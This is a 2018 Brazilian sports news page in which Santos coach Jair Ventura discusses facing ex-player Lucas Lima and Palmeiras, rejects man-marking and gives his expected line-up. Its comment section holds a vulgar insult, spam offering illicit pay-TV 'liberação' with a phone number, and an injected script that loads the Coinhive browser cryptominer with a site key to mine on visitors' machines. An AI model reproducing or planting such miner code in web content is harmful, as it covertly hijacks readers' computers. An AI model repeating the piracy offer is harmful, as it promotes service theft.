Jair vê Santos motivado para vencer L. Lima e descarta marcação individual

2/2/2018 13:36

Jair vê Santos motivado para vencer L. Lima e descarta marcação individual

Jair vê Santos motivado para vencer L. Lima e descarta marcação individual

Meia enfrenta o Santos pela 1ª vez após a sua saída do clube no fim do ano passado



O técnico Jair Ventura admitiu que os atletas do Santos estão mais motivados para o clássico contra o Palmeiras neste domingo, às 17h (de Brasília), no Allianz Parque, válido pela quinta rodada do Campeonato Paulista. O motivo é a presença de Lucas Lima na equipe rival. É a primeira vez que o meia encara o time santista após a sua saída do clube no fim do ano passado.







Para Jair Ventura, os jogadores sabem que Lucas Lima é provocador e, por isso, pretendem evitar a vitória do ex-companheiro de time no clássico.



"Eu não vejo problema. Desde que não falte respeito. É natural... Sai um pouco do mais do mesmo. Não vejo problema, é característica do Lucas, Braz deu uma declaração e não quer que ele ganhe. É algo a mais. Sei que vão dar algo a mais para não ouvir gracinha do Lucas", afirmou Jair Ventura, que também citou a rivalidade recente entre os clubes, muito provocada por Lucas Lima, quando defendia o Santos.



"A rivalidade está aflorada, mas dá para sentir. A briga está mais aflorada por causa dos grandes jogos recentes. Tendência é essa. Que possa ser um clássico da paz, principalmente fora dos estádios. Torcida única, mas violência existe, e que isso não ocorra. Somos referência para torcedores. Já vivemos uma violência tão grande... Que seja um clássico equilibrado, tranquilo, sem problemas", completou.





Ainda sobre Lucas Lima, o técnico santista rejeitou marcação individual para anular o camisa 20 do Palmeiras em campo.

"Marcação individual não. Não posso, porque dou mais espaço para o Dudu, Keno, Willian, Borja... Temos sistema defensivo, mas sem marcação especial pela qualidade do Palmeiras. Temos que ter a mesma atenção", disse.



Para encarar o Palmeiras, Jair Ventura escalou o atacante Sasha em treinamento nesta sexta-feira, na Vila Belmiro. Ele assume a vaga de Rodrigão, que vai para o banco de reservas. Gabigol, que deve fazer a sua reestreia no clássico, treinou entre os reservas. O jovem Rodrygo também integrou o time de Gabriel na atividade.



O Santos deve entrar em campo com a seguinte escalação: Vanderlei; Daniel Guedes, Luiz Felipe, David Braz e Caju; Alison, Renato e Vecchio; Arthur Gomes, Copete e Eduardo Sasha.



VEJA TAMBÉM
- GABRIEL JESUS PARA O MUNDIAL? Diretoria Alviverde de olho em provável saída do atacante do Arsenal
- Chelsea prepara oferta milionária por Estêvão, promessa do Palmeiras.
- Palmeiras busca penta na Copa do Brasil de olho em mais de R$ 90 milhões





2994 visitas - Fonte: UOL

Mais notícias do Palmeiras

Notícias de contratações do Palmeiras
Notícias mais lidas

santos é time de bosta
pode vim

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

(Comentário excluído)

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou .

Últimas notícias

publicidade
publicidade

Brasileiro

Qua - 20:00 - Arena Barueri -
X
Palmeiras
Internacional

Brasileiro

Dom - 18:30 - Manoel Barradas
0 X 1
Vitoria
Palmeiras